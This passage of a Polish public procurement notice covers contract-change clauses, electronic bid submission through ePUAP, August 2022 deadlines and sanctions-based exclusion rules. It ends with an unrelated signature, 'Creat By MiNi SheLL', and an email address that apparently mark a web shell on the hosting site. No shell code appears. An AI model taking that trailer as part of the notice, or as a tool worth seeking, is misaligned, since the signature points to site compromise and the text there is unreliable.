wynagrodz. Wyk. o kt. mowa w § 3 ust. 1, <br/>5)	przedłuż. term. realiz. zam., o kt. mowa w § 2 ust. 1, może nastąpić w przyp. wystąpienia warunków geolog. lub hydrolog. odmiennych od założonych w dok. proj. i powodujących konieczność wstrzymania robót lub konieczność ich wykonania przy wykorzystaniu odmiennych od zaprojektowanych rozwiązań techn., przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni niezbędną do wyeliminowania utrudnień związanych z ich wystąpieniem, <br/>6)	przedłużenia terminu wykonania zamówienia w zakresie niezbędnym do wykonania robót zleconych na podstawie art. 455 ust. 1 pkt 1, 3, 4 lub ust. 2 ustawy Pzp.,<br/>7)	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym bezpośredni wpływ na realizację przedmiotu zamówienia lub świadczenia stron umowy,<br/>8)	w przyp. zmiany albo rezygnacji z podwykon., na kt. zasoby Wyk. powoływał się w celu wykazania spełniania warunków udziału w postępowaniu Wyk. jest obowiąz. wykazać Zam., iż proponowany inny podwykon. lub Wyk. samodzielnie spełnia war.i udziału w postęp., w stopniu nie mniejszym niż wymagany w trakcie postępow. o udzielenie zamówienia, poprzez przedstawienie w tym celu odpowiednich dokumentów, potwierdzających spełnianie warunków udziału w postępowaniu,<br/>9)	zmiany sposobu rozliczania umowy lub dokonywania płatności na rzecz Wyk. wskutek zaistnienia przyczyn organizac. lub finans. leżących po str. Zam.,<br/>10)	wszelkie zmiany, które będą konieczne do zagwarantowania zgodności umowy z wchodzącymi w życie po terminie skł. of. lub po zaw. um. przepisami prawa w szczególności przepisami o podatku od towarów i usług w zakresie wynikającym z tych przepisów. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będzie korespondencja związana z postępowaniem</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-29 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-27</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Cd. Do Sekcji III pkt. 3.6.<br/>13.	Wykon. może przed upł. term.do skł. of. wycofać of. za pośr. „Formularza do złoż., zm., wycof. of. lub wniosku” dostępn. na ePUAP i udostęp. na miniPortalu. Sp. wycof. of. opisany w „Instr. użytkownika” dost. na miniPortalu.<br/>14.	Wykon. po upływie term. do skł. of. nie może skutecznie dokonać zm. ani wycofać złoż. of.<br/>15.	W post. o udz. zam. komunik. pom. Zam., a Wyk. w zakr. skł. dok., oświadczeń, wn. (innych niż ofert kt. mogą być przekazyw. tylko w sp. wsk. w pkt 11.8.SWZ) odbywa się elektr. za pośr. dedyk. form.: „Formularz do komunik.” dostęp. na ePUAP i udostępn. przez miniPortal lub poczty elektr. na: urzad@miedzyrzecgmina.pl<br/>Zam. przekaz. dok. na adres poczty elektr. wsk. w form. of. Wyk., na co Wykon. wyraża zgodę wskaz. ten adres w of. i zobow. się do utrzym. jego funkcjonaln. i przez czas trwania postępow. Domniemywa się, że dok., oświadcz. i wn. przekaz. na adres poczty elektr. wskazany w form. of. zostały doręczone skutecznie, a Wyk. zapoznał się z ich treścią.<br/>16.	W przyp. korzyst. z rozw. wskaz. w rozdz. 11.17 lit a) SWZ dok.elektron. skł. są przez Wyk.za pośredni. „Formularza do komunikacji” jako zał. <br/>17.	Zam. dopuszcza też możliw. skł. dok. elektr. za pom. poczty elektr. na wsk. w Roz. 11.17 lit b) SWZ adres p. elektr.<br/>18.	Sposób sporządz. dok. elektr. musi być zgody z wymag. określ. w rozporządz. PRM z 30.12.2020 r. w spr. spos. sporządz. i przekazyw. inf. oraz wymag. techniczn. dla dok. elektr. oraz śr. komunik. elektr. w post. o udz. zam. publ. lub konkursie oraz rozporządz. MRPiT z 2312.2020 r. w spr. podm. śr. dowod. oraz innych dok. lub ośw., jakich może żądać Zam. od Wyk.<br/><br/>Wykluczeniu z post. podl. Wyk. w stos., do kt. zachodzi którak. z okolicz. o kt. m. w art. 108 ust., a także:<br/>1) wymien. w wyk. określ. w rozp. Rady (WE) nr 765/2006 z 18.05.2006 r. dot. śr. ogranicz. w zw. z syt. na Białorusi i udz. Białorusi w agresji Rosji wobec Ukrainy (Dz. Urz. UE L 134 z 20.05.2006, str. 1, ze zm.) [dalej: rozp. Rady nr 765/2006] i rozporz. Rady (UE) nr 269/2014 z 17.03.2014 r. w spr. śr. ogranicz. w odnies. do dz. podważ. integr. terytor., suweren. i niezal. Ukrainy lub im zagrażających (Dz. Urz. UE L 78 z 17.03.2014, str. 6, ze zm.) [dalej: rozp. Rady nr 269/2014] albo wpis. na listę o kt. m. w art. 2 ust. z 13.04.2022 r. o szczeg. rozwiąż. w zakr. przeciwdz. wspier. agresji na Ukrainę oraz służ. ochr. bezpiecz. nar. [dalej: ust. o przeciwdz. agresji na UA] na podst. dec. w spr. wpisu na ww. listę rozstrzyg. o zastosow. śr.,o kt. m. w art. 1 pkt 3 pow. ust.; <br/>2) wyk. kt. beneficj. rzeczyw. w rozum. ust. z 1.03.2018 r. o przeciwdz. praniu pien. oraz finans. terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest os. wymien. w wyk. określ. w rozp. Rady nr 765/2006 i rozp. Rady nr 269/2014 albo wpis. na listę o kt. m. w art. 2 ust. o przeciwdz. agresji na UA lub będący takim beneficj. rzeczyw. od 24.02.2022 r. o ile zostali wpis. na ww. listę na podst. decyzji w spr. wpisu na listę rozstrzyg. o zastosow. śr. o kt. m. w art. 1 pkt 3 ust. o przeciwdz. agresji na UA;<br/> 3) wyk., kt. jednostką domin. w rozum. art. 3 ust. 1 pkt 37 ust. z 29.09.1994 r. o rachunkow. (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wym. w wyk. określ. w rozp. Rady nr 765/2006 i rozp. Rady nr 269/2014 albo wpis. na listę o kt. m. w art. 2 ust. o przeciwdz. agresji na UA lub będący taką jedn. domin. od 24.02.2022 r. o ile został wpis. na listę na podst. dec. w spr. wpisu na ww. listę rozstrzyg. o zastos śr. o kt. mowa w art. 1 pkt 3 ust. o przeciwdz. agresji na UA. <br/>Wykl., o kt. m.w pkt 1-3 nast. na okres trwania ww. okoliczn. W przyp. wykon. wyklucz. na podst. ww. przesł. Zam. odrzuca of. takiego wykon. os. lub podm. podleg. wyklucz. na podst. ww. przesł., kt. w okr. tego wyklucz. ubiegają się o udz. zam. publ. lub biorą udział w postępow. o udz. zam. publ., podleg. karze pieniężnej, kt. nakłada Prezes UZP w dr. dec. w wys. do 20mln zł za przyp. w kt. m. w pow. pkt. 1-3.

Creat By MiNi SheLL
Email: jattceo@gmail.com